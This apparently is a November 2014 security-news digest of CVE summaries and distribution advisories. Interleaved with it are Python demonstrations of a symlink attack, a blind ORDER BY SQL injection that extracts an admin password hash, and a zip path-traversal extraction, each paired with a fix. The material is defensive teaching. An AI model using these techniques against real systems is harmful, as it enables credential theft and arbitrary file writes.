The check_diskio plugin 3.2.6 and earlier for Nagios and Icinga allows local users to write to arbitrary files via a symlink attack on a temporary file with a predictable name (tmp/check_diskio_status-*-*).
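The symlink attack summarised above, as an added Python illustration that is not the plugin's own code: a temp-file name a local user can guess lets them pre-plant a symlink, and a later open-and-truncate follows it into whatever the plugin's uid may write. Creating the file with O_EXCL, or letting mkstemp choose the name, closes the hole. The directory layout, file names and the attacker step below are constructed so the demo runs in a scratch directory.

```python
"""Symlink attack on a predictable temporary file, and two safe alternatives.

Added illustration, not the check_diskio plugin's code. All paths and the
'attacker' step are constructed and run inside a throwaway directory.
"""
import os
import shutil
import tempfile


def write_status_predictable(tmpdir: str, tag: str, data: bytes) -> str:
    """Vulnerable pattern: the name is derivable from public inputs (here a
    device tag) and open(..., 'wb') is O_CREAT|O_TRUNC without O_EXCL, so a
    symlink planted at that name is followed and its target truncated."""
    path = os.path.join(tmpdir, f"check_diskio_status-{tag}")
    with open(path, "wb") as f:
        f.write(data)
    return path


def write_status_excl(path: str, data: bytes) -> None:
    """Fixed name, safe open: O_EXCL makes creation fail if anything already
    sits at `path` (a symlink included); O_NOFOLLOW is belt and braces."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def write_status_mkstemp(tmpdir: str, data: bytes) -> str:
    """Preferred: mkstemp picks an unpredictable name and creates it with
    O_EXCL atomically, so there is nothing for the attacker to pre-create."""
    fd, path = tempfile.mkstemp(prefix="check_diskio_status-", dir=tmpdir)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo() -> dict:
    """Play attacker and plugin in one process; report what each variant did."""
    root = tempfile.mkdtemp()
    try:
        tmpdir = os.path.join(root, "tmp")
        os.mkdir(tmpdir)
        # Stand-in for a file the plugin's uid may write but the attacker may not.
        victim = os.path.join(root, "victim.conf")
        with open(victim, "w") as f:
            f.write("original\n")

        # Attacker: guess the name the plugin will use and plant a symlink first.
        guessed = os.path.join(tmpdir, "check_diskio_status-sda")
        os.symlink(victim, guessed)

        # Plugin, vulnerable variant: the write lands in victim.conf.
        write_status_predictable(tmpdir, "sda", b"attacker-chosen content\n")
        with open(victim) as f:
            victim_after_vulnerable = f.read()
        with open(victim, "w") as f:          # restore before trying the fixes
            f.write("original\n")

        # Plugin, O_EXCL variant: creation is refused because the path exists.
        excl_refused = False
        try:
            write_status_excl(guessed, b"status\n")
        except OSError:
            excl_refused = True

        # Plugin, mkstemp variant: fresh random name, victim untouched.
        safe_path = write_status_mkstemp(tmpdir, b"status\n")
        with open(victim) as f:
            victim_after_safe = f.read()

        return {
            "victim_after_vulnerable": victim_after_vulnerable,
            "excl_refused": excl_refused,
            "safe_path_is_guessed": safe_path == guessed,
            "safe_path_is_symlink": os.path.islink(safe_path),
            "victim_after_safe": victim_after_safe,
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The O_EXCL variant is the minimal change when a fixed name is unavoidable, but it turns the attack into a denial of service (the plugin cannot create its file while the symlink is there), so mkstemp-style random names in a directory the attacker cannot write to are the better fix.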
Monthly Archives: November 2014
CVE-2014-9089 (mantisbt)
Multiple SQL injection vulnerabilities in view_all_bug_page.php in MantisBT before 1.2.18 allow remote attackers to execute arbitrary SQL commands via the (1) sort or (2) dir parameter to view_all_set.php.
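An ORDER BY injection of the kind the summary describes, as an added Python/SQLite illustration that is not MantisBT code: the schema, rows and the admin hash are constructed, and `list_bugs_vulnerable` stands in for any handler that concatenates sort and dir into the query text. Column names and ASC/DESC cannot be bound as placeholders, which is why this spot is so often concatenated; the fix is an allow-list of the values the UI actually offers.

```python
"""ORDER BY injection via sort/dir parameters, blind extraction, and the fix.

Added illustration, not MantisBT code. Schema, rows and the '$1$deadbeef'
hash are constructed sample data.
"""
import sqlite3
import string

ALLOWED_SORT = {"id", "summary", "priority", "last_updated"}  # columns the UI offers
ALLOWED_DIR = {"ASC", "DESC"}


def setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bug (id INTEGER PRIMARY KEY, summary TEXT,
                          priority INTEGER, last_updated INTEGER);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO bug VALUES (1, 'crash on save', 30, 100),
                               (2, 'typo in footer', 10, 200),
                               (3, 'xss in comments', 50, 150);
        INSERT INTO user VALUES (1, 'admin', '$1$deadbeef');
    """)
    return conn


def list_bugs_vulnerable(conn, sort: str, dir_: str) -> list:
    """Both request parameters become SQL text; returns ids in result order."""
    rows = conn.execute(f"SELECT id FROM bug ORDER BY {sort} {dir_}").fetchall()
    return [r[0] for r in rows]


def list_bugs_safe(conn, sort: str, dir_: str) -> list:
    """Map input onto a fixed allow-list; anything else never reaches the query."""
    if sort not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort!r}")
    direction = dir_.upper()
    if direction not in ALLOWED_DIR:
        raise ValueError(f"unsupported sort direction: {dir_!r}")
    rows = conn.execute(f'SELECT id FROM bug ORDER BY "{sort}" {direction}').fetchall()
    return [r[0] for r in rows]


def rejects(conn, sort: str, dir_: str) -> bool:
    """True if the allow-listed handler refuses this sort/dir pair."""
    try:
        list_bugs_safe(conn, sort, dir_)
    except ValueError:
        return True
    return False


def steal_hash(conn, max_len: int = 64) -> str:
    """Boolean-based blind extraction through the sort parameter: a CASE in
    ORDER BY sorts by id when a character guess is right (ids come back 1,2,3)
    and by priority when it is wrong (2,1,3), so row order is the oracle."""
    alphabet = "$" + string.ascii_letters + string.digits + "./"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "(CASE WHEN (SELECT substr(password_hash, %d, 1) FROM user "
                "WHERE username = 'admin') = '%s' THEN id ELSE priority END)"
                % (pos, ch)
            )
            if list_bugs_vulnerable(conn, payload, "ASC") == [1, 2, 3]:
                recovered += ch
                break
        else:
            break  # substr returned '' (end of string) or a char outside alphabet
    return recovered


if __name__ == "__main__":
    conn = setup()
    print("vulnerable, sort=priority:", list_bugs_vulnerable(conn, "priority", "ASC"))
    print("recovered admin hash:", steal_hash(conn))
    payload = "(CASE WHEN 1 THEN id ELSE priority END)"
    print("allow-list rejects payload:", rejects(conn, payload, "ASC"))
```

The dir parameter is concatenated at the same point, directly after the sort expression, so it is an equally usable injection point; the allow-list above treats both the same way. Quoting the allow-listed column name is not what makes the safe version safe, the set membership test is.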
Infographic: Cyber Monday – Everything you need to know
Cyber Monday is one of the biggest shopping days of the year; in 2013 shoppers spent a massive $2.3bn getting their Christmas bargains in. Where this kind of money flows, cybercriminals follow, as this infographic shows.
The post Infographic: Cyber Monday – Everything you need to know appeared first on We Live Security.
News websites hacked with ‘Syrian Electronic Army’ pop-up
A Thanksgiving attack across many Western news and information websites left visitors facing JavaScript pop-ups telling them they had been hacked by the Syrian Electronic Army, according to CNET.
The post News websites hacked with ‘Syrian Electronic Army’ pop-up appeared first on We Live Security.
FileVista Path Leakage / Path Write Modification
FileVista versions prior to 6.1 leak internal path information and allow files to be extracted outside the intended path.
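The "extraction outside of the stated path" problem, as an added Python illustration that is not FileVista code. It assumes the extraction in question is unpacking an uploaded archive (the summary does not spell out the mechanism) and uses a constructed zip with a `../` member; Python's own `ZipFile.extractall` sanitises names, so the vulnerable loop is written by hand to mirror what a hand-rolled extractor in any language tends to do.

```python
"""Archive extraction that escapes its destination, and a checked extractor.

Added illustration, not FileVista code; assumes 'extraction' means unpacking an
archive. The zip contents and directory layout are constructed for the demo.
"""
import io
import os
import shutil
import stat
import tempfile
import zipfile


def build_zip(entries: dict) -> bytes:
    """Build a zip in memory from {member_name: content}. Names are not
    sanitised at write time, so traversal names survive into the archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def extract_naive(blob: bytes, dest: str) -> list:
    """Vulnerable: trusts member names and joins them under dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def _inside(base: str, target: str) -> bool:
    """True if target, after resolving .. and existing symlinks, is under base."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def extract_checked(blob: bytes, dest: str) -> list:
    """Hardened: validate every member before writing anything. Rejects
    absolute names, names resolving outside dest, and symlink members
    (which could redirect a later member). Returns relative paths written."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        bad = []
        for info in zf.infolist():
            name = info.filename
            if os.path.isabs(name) or not _inside(dest, os.path.join(dest, name)):
                bad.append(name)
            elif stat.S_ISLNK(info.external_attr >> 16):  # unix mode lives in the high 16 bits
                bad.append(name)
        if bad:
            raise ValueError(f"refusing archive, unsafe members: {bad}")
        written = []
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(info))
            written.append(os.path.relpath(target, dest))
    return written


def demo() -> dict:
    root = tempfile.mkdtemp()
    try:
        evil = build_zip({
            "docs/readme.txt": "benign",
            "../../outside.txt": "escaped the upload directory",  # traversal member
        })
        dest1 = os.path.join(root, "uploads", "job1")
        os.makedirs(dest1)
        extract_naive(evil, dest1)
        # dest1/../../outside.txt resolves to root/outside.txt
        naive_escaped = os.path.isfile(os.path.join(root, "outside.txt"))

        dest2 = os.path.join(root, "uploads", "job2")
        os.makedirs(dest2)
        try:
            extract_checked(evil, dest2)
            checked_rejected = False
        except ValueError:
            checked_rejected = True
        checked_wrote_nothing = os.listdir(dest2) == []

        benign = build_zip({"docs/readme.txt": "benign"})
        checked_written = extract_checked(benign, dest2)
        return {"naive_escaped": naive_escaped, "checked_rejected": checked_rejected,
                "checked_wrote_nothing": checked_wrote_nothing,
                "checked_written": checked_written}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Validating the whole member list before the first write matters: an extractor that checks and writes member by member leaves a half-unpacked archive behind when it hits the bad entry, and an earlier symlink member can change where a later, apparently clean, name lands.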
Gamer PCs – how to keep yours clean and mean
Gamers have become major targets for hackers – from large-scale attacks against gaming companies, to small-scale scams carried out via game chat channels. But a few easy security steps should help keep your precious rig at full speed – and safe.
The post Gamer PCs – how to keep yours clean and mean appeared first on We Live Security.
Gentoo Linux Security Advisory 201411-11
Gentoo Linux Security Advisory 201411-11 – Multiple vulnerabilities have been found in Squid, allowing remote attackers to execute arbitrary code or cause a Denial of Service condition. Versions less than 3.3.13-r1 are affected.
Debian Security Advisory 3078-1
Debian Linux Security Advisory 3078-1 – An integer underflow flaw, leading to a heap-based buffer overflow, was found in the ksba_oid_to_str() function of libksba, an X.509 and CMS (PKCS#7) library. Specially crafted S/MIME messages or ECC-based OpenPGP data can trigger the overflow, which could cause an application using libksba to crash (denial of service) or potentially execute arbitrary code.
Mandriva Linux Security Advisory 2014-235
Mandriva Linux Security Advisory 2014-235 – Plack::App::File would previously strip trailing slashes off provided paths. This, in combination with the common pattern of serving files with Plack::Middleware::Static, could allow an attacker to bypass a whitelist of generated files.
Mandriva Linux Security Advisory 2014-234
Mandriva Linux Security Advisory 2014-234 – Updated libksba packages fix a security vulnerability. Specially crafted S/MIME messages or ECC-based OpenPGP data can trigger a buffer overflow, which could lead to a denial of service.